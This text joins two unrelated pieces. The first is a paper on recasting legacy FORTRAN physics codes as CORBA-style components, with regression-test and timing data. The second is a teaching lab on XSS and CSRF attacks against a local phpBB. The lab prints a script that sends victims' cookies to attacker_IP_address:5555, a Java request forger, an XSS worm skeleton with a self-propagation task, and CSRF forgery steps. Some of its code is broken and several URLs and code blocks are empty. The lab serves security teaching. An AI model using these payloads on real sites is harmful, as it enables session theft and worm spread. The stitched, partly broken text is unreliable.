computers are faster, resources such as disk and memory are cheaper, and far less physical space is required than when these codes were first developed. It is possible to construct massively parallel machines by harnessing a set of relatively inexpensive workstations or personal computers. Human resources with appropriate scientific computing knowledge and skill are far more expensive than computing platforms. Optimizations at a macro level and improved interactions between program modules have become more important than maximizing resource use at a micro level. An architectural solution is needed that supports this different philosophy. The size of the monolithic structure embodied in many scientific programs has reached a scale where very few scientists have an overall view of the parts as a whole. The development community for these codes is thus very small. To achieve an architecture that is approachable by a larger development community, we must create a cohesive set of smaller, modular components that can be composed to achieve the same effect as the huge monolithic program. **Terminology** In the subsequent discussion of both existing and suggested approaches, we will use three key terms. 1. **Objects** Objects are the fundamental unit of software design and implementation. Objects are used when software engineers model individual entities within a single program. A distinction is drawn between object-based design and implementation models and object-oriented design and implementation models. Object-based design and implementation techniques typically require only that the program design or implementation be structured out of entities that encapsulate processing and storage for each entity. Object-oriented design and implementation techniques typically add inheritance, polymorphism, and various other structuring facilities onto the object-based system. Organizing scientific codes as a set of objects may be done either as a new development or as a re-design of an existing legacy code. For the purposes of component architectures, it is sufficient that the software design have characteristics of encapsulation and isolation of entities so that these objects may be grouped into modules. It is often the case that existing codes break these requirements, as they may have been designed years before current technology existed, and may have been in continual use and modification since. The process of modular decomposition of these codes is primarily the application of these object-based encapsulation requirements to the existing codes to produce objects sufficient for grouping into modules. Our requirements for an object in software design and implementation are simpler than that of a full object-oriented design; we require no inheritance, polymorphism, encapsulation, or any other capabilities currently in vogue for objects. From the point of view of component architectures, the type of analysis, design, and programming technologies used for individual programs is simply not a concern. The main reason for discussing objects here is to note that the common terms dealing with object-oriented analysis, design, and programming and all the lifecycle tools and technologies built around these concepts do not affect our discussions of component architectures. This is not to discourage the use such technology as it will certainly aid the construction of correct codes at the single-program level and may simplify the migration of classic monolithic architectures to the modular architectures needed to build components. 2. Modules Modules are the fundamental unit of software distribution. Modules are used when describing the structure of individual programs or program libraries. Modules are groupings of freely interacting objects that are self contained and bounded. Interactions with objects in other modules are allowed only through well-defined interfaces. To other objects, a module is a black box whose only visible effects are those provided by the well-defined interfaces of the module. Modules are self-contained when they communicate with other modules only through these interfaces. Modules are bounded when objects outside the module only interact with the objects inside the module via the defined interface. A great deal of work is underway to modernize old scientific codes or produce new scientific codes at this level. Common techniques at this level include converting existing programs or writing new programs that use FORTRAN 90/95 modules or that use C++ class libraries. 3. Components Components are the fundamental unit of software marketing and commerce. Components are used when describing different organizations cooperating to produce specialized software capabilities that inter-operate across different individual programs. Components are groupings of modules with two additional constraints. First, the well-defined interface for the modules that compose the component is defined and enforced by computer tools. This means an Interface Definition Language (IDL), which is processed to automatically enforce modular containment and bounding, formally defines the interface. Second, a mechanism is added to allow control and discovery of the modules that make up the component and to control access to the modules within the component. This may be as simplistic as the system’s mechanism for finding and linking dynamic libraries, or as complex as a network interconnected request broker system. **Existing Approaches** Both the object and module approaches described above have been used with varying degrees of success to modernize the scientific codes that reside in the Laboratory. **Language Issues** One approach to the modernization problem is to rewrite the applications in newer languages such as C or C++ and newer FORTRAN versions such as FORTRAN 95. This language rewrite approach introduces integration problems when two or more modeling capabilities implemented in different languages must be coordinated to work together. We need solutions that go beyond a simple language upgrade. The various developers of the codes will never agree upon a single language. We are aware of several examples of this language issue. They include two variants of one code that are both moving from FORTRAN 77 to FORTRAN 90, one code written entirely in C++, one code written in FORTRAN 90 with a C++ main routine that is moving toward more C++, one FORTRAN 90 code with a C++ simulation module, and one code written in a hand-crafted object-oriented FORTRAN. Clearly, any attempt at integration of such disparate codes would have to go beyond a language-based solution. **Complexity Issues** A natural tendency, given expanded computer resources, is to add more complex data structures and functionality to the existing codes to support broader design and modeling contexts. Problems arise when the low level of abstraction (global variables and shared common data) present in many of the legacy codes introduces difficulties in identifying interfaces and integration points. Examples of this complexity expansion include programs whose structure still reflects the set of overlays from memory starved machines and programs that are the merger of two or more early programs that communicated with tapes and disk files. We need solutions that transcend the monolithic structure present in these codes. A limit has been reached in the size and complexity of these structures. **Suggested Approaches** In addition to the object and module level approaches in use, an architecture that supports the expansion of the community of users and developers is needed. This is and important characteristic of a component architecture. **Object-oriented Techniques Alone Are Not Enough** While object-oriented analysis, design, and programming techniques are widely accepted by the computing community as an efficient and robust method for software construction, the resulting individual programs are not sufficient by themselves to support the needs of a computing community. The ability of the community to extend old software and develop new software is constrained largely by the amount of reuse of existing objects that can be obtained and by how well existing programs can coexist and cooperate. By themselves, the techniques of object-oriented programming are of little help for this larger problem. **Modules Alone Are Not Sufficient** Modules represent a higher-level approach than objects. Typical module implementations include subroutine libraries and class libraries. These libraries are common on most current computing platforms. However, the discovery and dissemination of the module content is limited to user documentation and ad hoc browsing tools. Consequently, there is little or no enforcement of the use of the interfaces contained within the modules. This limits the ability to dynamically discover and reuse the module content in a way that enforces consistent and correct use. Modules of executable code are sufficient for delivery of an interacting set of objects, but by themselves, do not contribute to the dissemination of the interfaces provided by the modules. **Moving to a Component Architecture** Components add two things to module libraries. The definition and enforcement of module interfaces using IDL specifications and IDL compilers forms the basis for correct dissemination and use of module content. Using request broker facilities contributes to the discovery and delivery of the module contents. Once software is structured as components, the modules that make up the components can be treated as commodity items that are purchased or traded and reused. This is because of the two conditions of well-defined interfaces and run-time control of module discovery that combine to allow implementation details to be hidden behind interface definition and request broker facilities. Our motivation for moving to component architectures is to allow for the development and evolution of communities that can share and co-develop the software components in a way that allows an economy to emerge. These communities can be based around various economic models ranging from free trade to strict commercialization. We are not suggesting that communities cannot form around module libraries. Examples of such communities can be found, but with limitations. In order to solve the language, complexity, and evolution of community of issues, a component framework must be adopted that allows multi-language integration and facilitates a modular decomposition and integration of large and complex codes. An industry standard framework that addresses these two issues exists in the Common Object --- Request Broker Architecture (CORBA). Both an overview and detailed information can be found at the CORBA web site at [http://www.corba.org](http://www.corba.org). The CORBA framework has a standard Interface Definition Language (IDL) for expressing public application interfaces that permit decomposition of large codes. This mechanism also mitigates the language integration problem. CORBA typically operates in a networked environment. This does not accommodate the performance demands of physics modeling codes. Sufficient performance can be achieved by using run-time loading of dynamic modules as an implementation of CORBA objects while retaining the benefits of the CORBA framework. This framework offers the desired multi-language interoperability, facilitates evolution of the code, and retains the existing scientific value of the codes. **Additional Component Architecture Benefits** With a modular and dynamic framework in place, new user interface technology is possible. These include adoption of newer input data specification languages such as Extensible Markup Language (XML) and newer output representations like Java components that make these codes more approachable by a broader user audience in a web-based setting. The program structures that process inputs are generally ad-hoc, dispersed throughout the code, and tightly coupled to the low-level data abstractions. It is difficult to understand and extend input processing in these codes. An architectural approach that localizes and contains input processing allows us to extend and expand the types of data processed. XML is particularly appealing because of the self-documenting structure that can be achieved when using this kind of language to describe the various materials used in physics modeling. XML processing modules for the various types of data used in the modeling programs could then be used dynamically by the core modeling code when and where necessary. Historically, inputs were often limited to 80 column card images, with ad-hoc comment conventions, special characters for field delimiters, continuations, and input terminators, and multiple special case overloading interpreted by matching ad-hoc code. As an example, a material specification might appear as: ``` m1 13027.40c 1 m2 26000.40c 1 ``` Without referring to a manual, how does one know or remember that the 13027.40c is the concatenation of atomic number, atomic mass, a separator, a library identifier, and a data class specification? XML describes a class of data objects and partially describes the behavior of computer programs which process them. A structured self-documenting material specification in XML might be: ```xml <material> <num>1</num> <atomnum>130</atomnum> <atommass>27</atommass>. <libraryid>40</libraryid> <dataclass>c</dataclass> <atomfraction>1</atomfraction> </material> ``` Or if defined as an element with attributes: ```xml <material num="1" atomnum="130" atommass="27" libraryid="40" dataclass="c" atomfraction="1"> ``` While this looks formidable at first glance, keep in mind that these kinds of entries can now be the result of choosing items from graphical displays and do not have to be hand-written. Existing input files can be translated to XML syntax with by scripts written in pattern matching languages. There are utilities to render graphical representations of the data used in the physics modeling codes. Often these are hand crafted two or three dimensional plotting packages that are tightly coupled to the low-level data abstractions present in the codes. A component approach would introduce a more independent and reusable visual presentation capability with its own attributes, physical layout, and containment. With input and output handling mechanisms such as the ones just described, the physics modeling codes can now be deployed to a broad audience on a network and browser based environment as well as a more traditional graphical user interface. **Assumptions and Conditions** Our suggested CORBA-based component approach is based on several assumptions. We believe that optimizations at the Object Request Broker (ORB) level that recognize shared address space interactions make these types of solutions reasonable. When both the client and server appear in the same ORB address space, the need for marshalling-transmit, then transmit-demarshalling of the parameters exchanged between the (client) stub and (server) skeleton is eliminated. A simplified look-up mechanism similar to what occurs for dynamic linking can be used. This optimized approach can be found, for example, in the ORBit object request broker. ORBit is a CORBA 2.2-compliant Object Request Broker (ORB) that is developed and released as open source software under the GNU General Public License and GNU Lesser General Public License (GPL/LGPL) and is supported by Red Hat and Ximian as part of the GNOME project. ORBit is engineered for the desktop workstation environment, with a focus on performance, low resource usage, and security. A language binding defines how to use the IDL operations in a programming language. The current content of the CORBA web site indicates that there is no IDL / Language Mapping Specification for FORTRAN. We assume that a CORBA language binding for FORTRAN can be developed based upon the Language Mapping Specification for C. This is the trickiest part of implementing our component-based solution. Until a formal language mapping is available for FORTRAN, we must manually write and handle the code that an IDL compiler would generate. **Preservation of Existing Value** While the modernization of these scientific codes is underway, we must demonstrate that we have not impacted or removed any existing physics modeling capability. This assurance comes from the use of an automated regression testing mechanism that is run on a nightly basis. Our current regression test mechanism encompasses a dozen different networked computer hosts (referred to as our “test farm”) and exercises 10 different combinations of hardware, operating systems, and compilers (our test farm). It also exercises the static and dynamic construction and execution techniques. A specially constructed set of roughly 40 to 50 different test problems are run against the constructed executable code. These tests range from code coverage tests that exercise a large percentage of the code through physics model validation tests that exercise specific code features. A set of expected results is compared to the set of computed results. When the answers are a close enough match, we declare that the tests “track” the existing expected answers. Round-off errors on various platforms using different math library versions sometimes prevent exact matches. The testing proceeds as follows: **Step 1.** Each night at a designated time, an operating system command activates the regression test driver program. Using a special testing account, the regression test driver program first assures that the most recent version of the code from the Concurrent Versions System (CVS) repository is placed into a common shared file partition on one of the test farm machines. This common file partition is exported on the network so it can be accessed by all of the test farm host computers. This assures that the same source code base is used on each of the various hardware platforms. **Step 2.** The regression test driver program then performs a secure shell login to each of the test farm machines, and runs a shell script to “configure” the source code for the particular ‘hardware/operating system/Fortran compiler/C compiler’ combination being tested. After a successful configure, the shell script “makes” the executable program and performs a “make tests” command to activate the tests. These special “make” commands are generated output of the configure step. **Step 3.** All the generated output from the shell script execution is captured on each machine that is tested. The following morning, the output on each platform is gathered and examined. Future development of this regression test capability includes an automated checking of all of the generated output on each platform and generation of a web page that developers can check. Analysis We are in the early stages of our modernization effort. We have demonstrated that CORBA-like in-memory optimizations work and are usable. Existing ORBs such as ORBit already implement and use this optimization. For our work at the Laboratory, as a first step we have produced an independent implementation of a framework that dynamically loads modules and uses an IDL syntax and compiler to generate non-CORBA stub and skeleton code for efficient in-process communication. This structure allows us to experiment with decomposition strategies for large scientific codes while retaining compatibility with CORBA. The correct decomposition of portions of the code that represent reasonable approximations of architectural physics components must be determined, but we have the necessary structure to begin experimentation. Interfaces for appropriate components must be identified and developed. While the component structure is being discovered, the existing capability in the code must not be compromised and is being assured with our automated regression test mechanism. Performance and/or Complexity Data We are running the code both in its monolithic form and within the new dynamically linked framework. Our timing statistics for execution of the regression tests are shown in the accompanying Timing Table and range from little difference on the newer machines to a larger difference on older machines. However, execution speed alone is not the only metric to be considered. We believe the increased access to code capability and ease of extension will guarantee its continued use and further development. We believe “pluggable” physics modules can be attained using component architectures. Result of the Work The result of this work is not intended for commercial production. It is being undertaken to protect an investment. ## Timing Table <table> <thead> <tr> <th>Platform &amp; compilers</th> <th>Construction Method</th> <th>Make Tests Seconds</th> <th>% Difference vs Static</th> </tr> </thead> <tbody> <tr> <td>Linux i686 pgf77 gcc</td> <td>static</td> <td>1459.64</td> <td></td> </tr> <tr> <td>Linux i686 pgf77 gcc</td> <td>shared</td> <td>1585.30</td> <td></td> </tr> <tr> <td><strong>Difference</strong></td> <td></td> <td><strong>125.66</strong></td> <td><strong>9 % slower</strong></td> </tr> <tr> <td>Linux sparc g77 gcc</td> <td>static</td> <td>33092.21</td> <td></td> </tr> <tr> <td>Linux sparc g77 gcc</td> <td>shared</td> <td>36455.07</td> <td></td> </tr> <tr> <td><strong>Difference</strong></td> <td></td> <td><strong>3362.86</strong></td> <td><strong>10 % slower</strong></td> </tr> <tr> <td>SunOS sun4m f77 cc</td> <td>static</td> <td>66864.88</td> <td></td> </tr> <tr> <td>SunOS sun4m f77 cc</td> <td>shared</td> <td>86557.35</td> <td></td> </tr> <tr> <td><strong>Difference</strong></td> <td></td> <td><strong>19692.40</strong></td> <td><strong>29 % slower</strong></td> </tr> <tr> <td>OSF1 (Tru64) alpha f77 cc</td> <td>static</td> <td>1267.20</td> <td></td> </tr> <tr> <td>OSF1 (Tru64) alpha f77 cc</td> <td>shared</td> <td>1295.60</td> <td></td> </tr> <tr> <td><strong>Difference</strong></td> <td></td> <td><strong>28.40</strong></td> <td><strong>2 % slower</strong></td> </tr> <tr> <td>HP-UX 9000/735 fort77 cc</td> <td>static</td> <td>6964.80</td> <td></td> </tr> <tr> <td>HP-UX 9000/735 fort77 cc</td> <td>shared</td> <td>7888.80</td> <td></td> </tr> <tr> <td><strong>Difference</strong></td> <td></td> <td><strong>924.00</strong></td> <td><strong>13 % slower</strong></td> </tr> </tbody> </table>
{"Source-Url": "https://digital.library.unt.edu/ark:/67531/metadc723405/m2/1/high_res_d/789478.pdf", "len_cl100k_base": 5026, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 19649, "total-output-tokens": 5494, "length": "2e12", "weborganizer": {"__label__adult": 0.0003216266632080078, "__label__art_design": 0.00036978721618652344, "__label__crime_law": 0.00028061866760253906, "__label__education_jobs": 0.0005731582641601562, "__label__entertainment": 8.493661880493164e-05, "__label__fashion_beauty": 0.0001481771469116211, "__label__finance_business": 0.0002639293670654297, "__label__food_dining": 0.00034165382385253906, "__label__games": 0.0004546642303466797, "__label__hardware": 0.001987457275390625, "__label__health": 0.00041103363037109375, "__label__history": 0.00034165382385253906, "__label__home_hobbies": 0.00010532140731811523, "__label__industrial": 0.0007152557373046875, "__label__literature": 0.00020194053649902344, "__label__politics": 0.00021564960479736328, "__label__religion": 0.0004863739013671875, "__label__science_tech": 0.07965087890625, "__label__social_life": 8.970499038696289e-05, "__label__software": 0.01041412353515625, "__label__software_dev": 0.9013671875, "__label__sports_fitness": 0.00035858154296875, "__label__transportation": 0.0006728172302246094, "__label__travel": 0.0002181529998779297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25649, 0.02142]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25649, 0.75798]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25649, 0.91291]], "google_gemma-3-12b-it_contains_pii": [[0, 2807, false], [2807, 5550, null], [5550, 8447, null], [8447, 11067, null], [11067, 13992, null], [13992, 16617, null], [16617, 19217, null], [19217, 22264, null], [22264, 24106, null], [24106, 25649, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2807, true], [2807, 5550, null], [5550, 8447, null], [8447, 11067, null], [11067, 13992, null], [13992, 16617, null], [16617, 19217, null], [19217, 22264, null], [22264, 24106, null], [24106, 25649, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25649, null]], "pdf_page_numbers": [[0, 2807, 1], [2807, 5550, 2], [5550, 8447, 3], [8447, 11067, 4], [11067, 13992, 5], [13992, 16617, 6], [16617, 19217, 7], [19217, 22264, 8], [22264, 24106, 9], [24106, 25649, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25649, 0.09189]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
5a45fd4be78955770a7d73edf08528ce32c46497
1 Overview Cross-site scripting (XSS) and cross-site request forgery (CSRF or XSRF) are two types of vulnerabilities commonly found in web applications. These vulnerabilities make it possible for attackers to inject malicious code (e.g., JavaScript programs) into victims’ web browsers, steal their credentials, or perform actions without even having a victim’s credentials. The access control policies employed by browsers to protect a user’s credentials can often be bypassed by exploiting XSS or CSRF vulnerabilities. Vulnerabilities of this kind can potentially lead to large-scale attacks. 2 XSS Attacks To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web-based message board using phpBB. We modified the software to introduce an XSS vulnerability in this message board; this vulnerability allows users to post an arbitrary message to the board, including JavaScript programs. You will need to exploit this vulnerability by posting some malicious messages to the message board. Users who view these malicious messages will become victims. The attacker’s goal is to post forged messages for the victims. 2.1 Project Environment For this part of the project, we will need three things: (1) the Firefox web browser, (2) the apache web server, and (3) the phpBB message board web application. For the browser, we will use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses. The pre-built Ubuntu VM image provided to you already has Firefox installed with the required extensions. The apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands: ```bash % sudo apache2ctl start or % sudo service apache2 start ``` The phpBB web application is already set up in the pre-built Ubuntu VM image as well. We have also created several user accounts in the phpBB application. User information can be obtained by selecting the “Memberlist” link on the front page. The password for each user is the same as his or her user name. You can access the phpBB server using the following URL (the apache server needs to be started first): ``` http://www.xsslabphpbb.com ``` This URL is only accessible from inside of the virtual machine, because we have modified the `/etc/hosts` file to map the domain name (`www.xsslabphpbb.com`) to the virtual machine’s local IP address (127.0.0.1). You may map any domain name to a particular IP address using the `/etc/hosts` file. For example you can map `http://www.example.com` to the local IP address by appending the following entry to `/etc/hosts` file: ``` 127.0.0.1 www.example.com ``` In the pre-built VM image, we use the same apache web server to host several different URLs (some URLs are used for other projects). It is configured to map each of the URLs to a particular directory under /var/www/. For example, the server-side code for the http://www.xsslabphpbb.com URL is stored in the following directory: /var/www/XSS/XSSLabPhpbb/ 2.2 XSS Tasks 2.2.1 Task 1.1: Posting a Malicious Message to Display an Alert Window The objective of this task is to post a malicious message that contains JavaScript to display an alert window. The JavaScript should be provided along with the user comments in the message. The following JavaScript will display an alert window: ```html <script>alert('XSS');</script> ``` If you post this JavaScript along with your comments in the message board, then any user who views this comment will see the alert window. 2.2.2 Task 1.2: Posting a Malicious Message to Display Cookies The objective of this task is to post a malicious message on the message board containing JavaScript code, such that whenever a user views this message, the user’s cookies will be printed out. For instance, consider the following message that contains JavaScript code: ```html <script>alert(document.cookie);</script> Hello Everyone, Welcome to this message board. ``` When a user views this message post, he/she will see a pop-up message box that displays a cookie for the user. 2.2.3 Task 1.3: Stealing Cookies from a Victim’s Machine In the previous task, the malicious JavaScript code can print out a user’s cookie; in this task, the attacker wants the JavaScript code to send cookies to himself/herself. To achieve this, the malicious JavaScript code can send a HTTP request to the attacker with the cookies appended to the request. We can do this by having the malicious JavaScript insert a `<img>` tag with `src` set to the URL of the attackers destination. When the JavaScript inserts the img tag, the browser tries to load the image from the mentioned URL and in the process ends up sending a HTTP GET request to the attacker’s website. The JavaScript given below sends the cookies to port 5555 on the attacker’s machine. On the particular port, the attacker has a TCP server that simply prints out the request it receives. The TCP server program will be given to you. ```html Hello Folks, <script>document.write('<img src=http://attacker_IP_address:5555?c=' + document.cookie + '>'); </script> This script is to test XSS. Thanks. ``` 2.2.4 Task 1.4: Impersonating the Victim using the Stolen Cookies After stealing the victim’s cookies, the attacker can do whatever the victim can do in the phpBB webapp, including posting a new message in the victim’s name, deleting the victim’s posts, etc. In this task, we will write a program to forge a message post on behalf of the victim. To forge a message post, we should first analyze how phpBB works in terms of posting messages. More specifically, our goal is to figure out what is sent to the server when a user posts a message. Firefox’s LiveHTTPHeaders extension can help us; it displays the contents of any HTTP request message sent from the browser. From the contents, we can identify all of the parameters of the message. A screen shot of LiveHTTPHeaders is given in Figure 2. It is already installed in the pre-built Ubuntu VM image. Once you understand what the HTTP request for message posting looks like, we can write a Java program to send out the same HTTP request. The phpBB server cannot distinguish whether the request is sent out by the user’s browser or by the attacker’s Java program as long as we set all the parameters in the HTTP request correctly. To simplify your task, we provide you with a sample Java program that does the following: 1. Opens a connection to web server. 2. Sets the necessary HTTP header information. 3. Sends the request to web server. 4. Gets the response from web server. ```java import java.io.*; import java.net.*; public class HTTPSimpleForge { public static void main(String[] args) throws IOException { try { int responseCode; InputStream responseIn=null; // URL to be forged. URL url = new URL("http://www.xsslabphpbb.com/profile.php"); // URLConnection instance is created to further parameterize a // resource request past what the state members of URL instance // can represent. URLConnection urlConn = url.openConnection(); // HttpURLConnection a subclass of URLConnection is returned by // url.openConnection() since the url is an http request. if (urlConn instanceof HttpURLConnection) { urlConn.setConnectTimeout(60000); urlConn.setReadTimeout(90000); } // addRequestProperty method is used to add HTTP Header Information. // Here we add User-Agent HTTP header to the forged HTTP packet. urlConn.addRequestProperty("User-agent","Sun JDK 1.6"); // HTTP Post Data which includes the information to be sent to the server. String data="username=admin&email=admin%40seed.com"; ``` // DoOutput flag of URL Connection should be set to true // to send HTTP POST message. urlConn.setDoOutput(true); // OutputStreamWriter is used to write the HTTP POST data // to the url connection. OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream()); wr.write(data); wrfush(); // Again: HttpURLConnection a subclass of URLConnection is returned by // url.openConnection() since the url is an http request. if (urlConn instanceof HttpURLConnection) { HttpURLConnection httpConn = (HttpURLConnection) urlConn; // Contacts the web server and gets the status code from // HTTP Response message. responseCode = httpConn.getResponseCode(); System.out.println("Response Code = " + responseCode); // HTTP status code HTTP_OK means the response was // received sucessfully. if (responseCode == HttpURLConnection.HTTP_OK) { // Get the input stream from url connection object. responseIn = urlConn.getInputStream(); // Create an instance for BufferedReader // to read the response line by line. BufferedReader buf_in = new BufferedReader( new InputStreamReader(responseIn)); String inputLine; while((inputLine = buf_in.readLine())!=null) { System.out.println(inputLine); } } } } catch (MalformedURLException e) { e.printStackTrace(); } If you have trouble understanding the above program, we suggest you to read the following: - JDK 6 Documentation: http://java.sun.com/javase/6/docs/api/ **Limitation:** The forged message post should be generated from the same virtual machine i.e., the victim (user connected to the web forum) and the attacker (one who generates a forged message post) should be on the same machine because phpBB uses both the source IP address and cookie for session management. If the attacker generates the forged message post from a different machine, the IP address of the forged packet and the victim’s IP address would differ. Hence, the forged message post would be rejected by the phpBB server despite the fact that the forged message carries the correct cookie information. 2.2.5 Task 1.5: Writing an XSS Worm In the previous task, we have learned how to steal the cookies from the victim and then forge HTTP requests using the stolen cookies. In this task, we need to write a malicious JavaScript to forge a HTTP request directly from the victim’s browser. JavaScript code that can achieve this is called a cross-site scripting worm. For this web application, the worm program should do the following: 1. Retrieve the session ID of the user using JavaScript. 2. Forge a HTTP post request to post a message using the session ID. There are two common types of HTTP requests: one is an HTTP GET request, and the other is an HTTP POST request. These two types of HTTP requests differ in how they send the contents of the request to the server. In phpBB, the request for posting a message uses HTTP POST requests. We can use the XMLHttpRequest object to send HTTP GET and POST requests for web applications. XMLHttpRequest can only send HTTP requests back to the server, instead of other computers, because browser same-origin policies are strongly enforced for XMLHttpRequest. This is not an issue for us, because we do want to use XMLHttpRequest to send a forged HTTP POST request back to the phpBB server. To learn how to use XMLHttpRequest, you can study these cited documents [1,2]. If you are not familiar with JavaScript programming, we suggest that you read [3] to learn some basic JavaScript functions. You will have to use some of these functions. You may also need to debug your JavaScript code. Firebug is a Firefox extension that helps you debug JavaScript code. It can point you to the precise places that contain errors. It is already installed in our pre-built Ubuntu VM image. Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to the phpBB message board, you need to remove all the comments, extra space, and new-line characters. ```javascript <script> var Ajax=null; // Construct the header information for the Http request Ajax=new XMLHttpRequest(); Ajax.open("POST","http://www.xsslabphpbb.com/posting.php",true); Ajax.setRequestHeader("Host","www.xsslabphpbb.com"); Ajax.setRequestHeader("Keep-Alive","300"); Ajax.setRequestHeader("Connection","keep-alive"); Ajax.setRequestHeader("Cookie",document.cookie); Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); // Construct the content. The format of the content can be learned // from LiveHttpHeader. All we need to fill is subject, message, and sid. var content="subject=" + "XSSWorm" + "..."; // You need to fill in the details. // Send the HTTP POST request. Ajax.send(content); </script> To make our worm work, we should pay attention to how the session ID (sid) information is used by phpBB. From the output of the LiveHTTPHeaders extension, we can notice that sid appears twice in the message-posting request. One is in the cookie section (it is called phpbb2mysql_sid). Therefore, the HTTP POST request sent out by XMLHttpRequest must also include the cookie. We already did it for you in the above skeleton code. If we look carefully at the LiveHTTPHeaders output, we can see that the same session id also appears in the line that starts with "subject=". The phpBB server uses the session id here to prevent another type of attack (i.e., the cross-site request forgery attack discussed in the second half of this assignment). In our forged message-posting request, we also need to add this session ID information; the value of this session ID is exactly the same as that in phpbb2mysql_sid. Without this session ID in the request, the request will be discarded by the server. In order to retrieve the sid information from the cookie, you may need to learn some string operations in JavaScript. You should study this cited tutorial [4]. 2.2.6 Task 1.6: Writing a Self-Propagating XSS Worm (Bonus) For extra credit: The worm built in the previous task only forges a message on behalf of the victims; it does not propagate itself. Therefore, technically speaking, it is not a worm. To be able to propagate itself, the forged message should also include a worm, so whenever somebody clicks on the forged message, a new forged message that carries the same worm will be created. This way, the worm can be propagated. The more people click on the forged messages, the faster the worm can propagate. In this task, you need to expand what you did in Task 1.5, and add a copy of the worm to the body of the forged message. 3 CSRF Attack In this part of the project, you will be attacking a web-based message board system using CSRF attacks. You can access the phpBB server (for this part of the project) using the following URLs (again, the apache server needs to be started first): <table> <thead> <tr> <th>URL</th> <th>Description</th> <th>Directory</th> </tr> </thead> <tbody> <tr> <td><a href="http://www.csrflabattacker.com">http://www.csrflabattacker.com</a></td> <td>Attacker web site</td> <td>/var/www/CSRF/Attacker/</td> </tr> <tr> <td><a href="http://www.originalphpbb.com">http://www.originalphpbb.com</a></td> <td>Original phpBB</td> <td>/var/www/OriginalPhpbb/</td> </tr> </tbody> </table> 3.1 Background of CSRF Attacks A CSRF attack involves a victim user, a trusted site, and a malicious site. The victim user holds an active session with a trusted site and simultaneously visits a malicious site. The malicious site injects a HTTP request for the trusted site into the victim user session, compromising its integrity. The attack involves the following sequence of steps: 1. The victim user logs into the trusted site using her username and password, and thus creates a new session. 2. The trusted site stores the session identifier for the session in a cookie in the victim user’s web browser. 3. The victim user visits a malicious site. 4. The malicious site’s web page sends a request to the trusted site from the victim user’s browser. 5. The web browser automatically attaches the session cookie to the malicious request because it is targeted for the trusted site. 6. The trusted site processes the malicious request forged by the attacker web site. The malicious site can forge both HTTP GET and POST requests for the trusted site. Some HTML tags such as `img`, `iframe`, `frame`, and `form` have no restrictions on the URL that can be used in their attribute. HTML `img`, `iframe`, and `frame` can be used for forging GET requests. The HTML `form` tag can be used for forging POST requests. The tasks in this part of the project involve forging both GET and POST requests for a target application. ### 3.2 CSRF Tasks For the project task, you will use two web sites that are locally setup in the virtual machine. The first web site is the vulnerable phpBB accessible at `www.csrflabphpbb.com` inside the virtual machine. The second web site is an attacker web site that the student would setup to attack the trusted site. The attacker web site is accessible via `www.csrflabattacker.com` inside the virtual machine. #### 3.2.1 Task 2.1: Attack using HTTP GET request In the vulnerable phpBB, a new topic can be posted using a GET request targeted for the following URL: ``` ``` The URL has two parameters, `mode=newtopic` and `f=1`. These parameters tell the server-side script `posting.php` that the request is intended to post a new message to forum 1. To forge a request to post a new topic to the forum, the malicious site can use the URL in a HTML `img` tag inside a web page. ``` <html> </html> ``` Whenever the victim user visits the crafted web page in the malicious site, the web browser automatically issues a HTTP GET request for the URL contained in the `img` tag. Because the web browser automatically attaches the session cookie to the request, the trusted site cannot distinguish the malicious request from the genuine request and ends up processing the request compromising the victim user’s session integrity. For this task, you will observe the structure of a different request for posting a new message in the vulnerable phpBB application and then try to forge it from the malicious site. You can use the `LiveHTTPHeaders` extensions to observe the contents of the HTTP requests. You will see something similar to the following: ``` addbbcode18=%2344444444&addbbcode20=0&helpbox=Quote+text+%3A+%5Bquote%5Dtext%5B%2Fquote%5D++%28alt%2Bq%29&message=This+is+ my+message&topictype=0&poll_title=&add_poll_option_text=& poll_length=&mode=newtopic&f=1&post=Submit ``` Observe the request structure for posting a new message to the forum and then use this to forge a new request to the application. When the victim user visits the malicious web page, a malicious request for posting a message should be injected into the victim’s active session with phpBB. 3.2.2 Task 2.2: Attack in HTTP POST request HTTP GET requests are typically used for requests that do not involve any side effects, i.e., they simply retrieve (but do not modify) server data. The original phpBB does not use GET requests for posting a new message to the forum. We modified the source code of phpBB so that new messages can be posted using GET requests to facilitate Task 2.1. In this task, you will forge a POST request that modifies the profile information in phpBB - www.csrflabphpbb.com. In a HTTP POST request, the parameters for the request are provided in the HTTP message body. Forging HTTP POST request is slightly more difficult. A HTTP POST message for the trusted site can be generated using a form tag from the malicious site. Furthermore, we need a JavaScript program to automatically submit the form. The server-side script profile.php allows users to modify their profile information using a POST request. You can observe the structure of the request, i.e the parameters of the request, by making some modifications to the profile and monitoring the request using 